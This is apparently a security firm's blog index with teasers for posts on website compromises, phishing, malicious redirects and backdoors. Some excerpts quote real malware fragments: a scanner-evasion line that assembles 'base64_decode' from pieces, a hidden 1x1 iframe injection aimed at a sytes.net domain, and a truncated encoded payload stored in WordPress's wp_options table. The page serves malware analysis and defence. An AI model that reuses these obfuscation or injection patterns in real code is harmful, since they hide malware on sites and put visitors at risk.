Popular Brazilian Site “Porta dos Fundos” Hacked

A very well known Brazilian comedy site, “Porta dos Fundos,” was recently hacked and is pushing malware (drive-by-download) via a malicious Flash executable, as you can see from our Sitecheck results:

SiteCheck Found Malware on Porta dos Fundos

SiteCheck Found Malware on Porta dos Fundos

If you do not want the joke to be on you, do not visit this site (portadosfundos) until it has been cleaned.

The infection starts with malicious javascript injected at the top of the code, which loads content from another compromised site, www.gpro.co.mz:


Read More

Phishing with help from Compromised WordPress Sites

We get thousands of spam and phishing emails daily. We use good spam filters (along with Gmail) and that greatly reduces the noise in our inbox. Today though, one slipped through the crack and showed up in my personal inbox:

Gmail Phishing


Read More

Website Malware: Mobile Redirect to BaDoink Porn App Evolving

Recently, we wrote about a malware redirect causing compromised sites to redirect their visitors to pornographic content (specifically, the BaDoink app). You can read more about what we found by going to our previous blog post.

As described in the original post, some particular files were infected (examples were the index.php, wp-config.php and others). We thought that was enough malware for one app. However, while we were working on an infected site today, we found a new malware injection causing this redirect.

Since all of the website files were clean and we didn’t find any suspicious Apache modules or binaries, it took a while for us to figure out the problem. However, it became much more clear once we investigated the PHP binary and found some suspicious entries.

Read More

Darkleech + Bitly.com = Insightful Statistics

This post is about how hackers abuse popular web services and how this helps security researchers obtain interesting statistics about malware attacks.

We, at Sucuri, work with infected websites every day. While we see some particular infections on one site or on multiple sites, we can’t accurately tell how many more sites out there are infected, and how many people were exposed to that malware. All we can do is estimate.

Most estimations are based on data that can’t provide the whole picture, such as the number of detections in our SiteCheck scanner, the number of cleanup requests, or the number of posts about a particular problem in webmaster forums. This only helps to tell whether the issue is something “major” or “minor”.

Like any other professional security firm out there, we can make educated estimates. For example, we can target specific Google searches that reveal the number of sites that contain a certain string of text, or URL specific to a particular attack. Another example is an attack that uses one specific URL (or a few well known URLs) allowing Google Safe Browsing reports to estimate the number of infected sites. The Google approaches are more precise, but they don’t work for most attacks that frequently change domains or have no artifacts that can be found in search results.

If security researchers are quite lucky, they might find an attacker’s unprotected (or poorly protected) Control Panel that contains all the statistics about infected site, clicks, exploits, etc.

This post will be about a different and quite unusual way of obtaining data about activity of a server-level attack that is known for being hard to detect and track.


Read More

Many Pieces of a Puzzle: Target, Neiman Marcus and Website Hacking

Website Malware

Corporations get hacked all the time. This is not news to anyone in the security business, but it has certainly received a lot of attention from those in the media over the last few weeks because of a couple of large-scale credit card events at both Target and Neiman Marcus.


Read More

vBulletin.com Compromised

The vBulletin team recently announced that they suffered a compromise which allowed the attackers access to vbulletin.com servers and database. On their own words:

We take your security and privacy very seriously. Very recently, our security team discovered sophisticated attacks on our network, involving the illegal access of forum user information, possibly including your password. Our investigation currently indicates that the attackers accessed customer IDs and encrypted passwords on our systems. We have taken the precaution of resetting your account password. We apologize for any inconvenience this has caused but felt that it was necessary to help protect you and your account.


Read More

Case Study: Analyzing a WordPress Attack – Dissecting the webr00t cgi shell – Part I

November 1st started like any other day on the web. Billions of requests were being shot virtually between servers in safe and not so safe attempts to access information. After months of waiting, finally one of those not so safe request hit one of our honeypots.

We won’t get into the location of the site because it really doesn’t matter, a fact that most critics don’t realize. As is often the case, the honeypot site was quiet without much traffic and the weakness was access control.

We intentionally left the password to the site to one of the top 10 passwords, with continuous attempts it took about 3 months before it was accessed.

This time though we were ready and this is how it went..

Read More

Backdoor Evasion Using Encrypted Content

A few weeks ago on the Sucuri Research Labs we mentioned a new type of malware injection that does not use base64_decode, and instead conceals itself as a variable and is built with a combination of “base_” + (32*2) + “_decode”. This is the part of the code where it is hidden:

$g___g_='base'.(32*2).'_de'.'code';

Any tool that looks for eval, followed by base64_decode, or just flags on any base64_decode usage, will not find it.

Read More

Malware iFrame Campaign from Sytes(.)net

For the last few weeks we have been tracking a large malframe (malicious iframe) campaign that has been injecting iframes from random domains from sytes(.)net into compromised sites.

Malicious iframe injection is nothing new, the bad guys have been using no-ip.org domains for a long time. But what is catching our attention is how often these domains are changing and how short a life-span they have.

This is the payload being added to the compromised sites:

<iframe src="httX:// krbnomrhp.sytes.net:12601 /cart/manuallogin/linktous.php?guardian=82" 
    width=1 height=1 style="visibility: hidden"></iframe>

As you can see, it is a normal iframe injection. But that domain will go offline in approximately 30 minutes and get replaced by a new one. Here is a list we compiled over the past 24 hours:

Read More

WordPress Database Table and wp_head Injections

There are multiple places where a malware injection can be hidden on a web site. On WordPress, for example, it can be hidden inside the core files, themes, plugins, .htaccess and on the database. More often than not, the malware uses a combination of those which makes it harder to detect.

Today, we will talk about a database injection that we are seeing often lately, that uses wp_head() to display the malware to anyone visiting a compromised web site.

Database Injection

WordPress offers multiple API calls to manage and read the content from inside the database. One of those calls is the get_option function that returns a value from the wp_options table. The wp_options table is widely used by many plugins and themes to store long term data, and is generally full of entries making it a good place to hide malicious code.

If you don’t believe me and you use WordPress, just list the wp_options table from your site to see what I am talking about.

Here’s what we are finding inside the wp_options table under “page_option” on some compromised sites:

s:7546:"a:18:{i:0;s:10:"11-07-
2013";i:1;s:1:"e";i:2;s:32:"061d57e97e504a23cc932031f712f730";
i:3;s:32:"07b6910226033fa5ee75721b4fc6573f";
i:4;s:4:"val(";i:5;s:32:"2a27230f54e4cea4a8ed38d66e2c0";
i:6;s:1:"(";i:7;s:6993:"'LyogTXVuaW5uIHZlcnNpb246MSBkYXRlOjIxLj
VFsncGFzcyddKT09PSc2OTJlM2Y1MmVlNmYxNmJjNzhmYTZlMWVjNGJkNGE2YSc
VCwgRVhUUl9TS0lQKTsKCglpZighZW1wdHkoJHRob3IpKQoJCUAkdGhvcigkaGF
dGlvbl9leGlzdHMgKCdzdHJpcG9zJykpIHsKCWZ1bmN0aW9uIHN0cmlwb3MgKCR
G9mZnNldD0wKSB7CgkJcmV0dXJuIHN0cnBvcyAoc3RydG...
... very long ..


Read More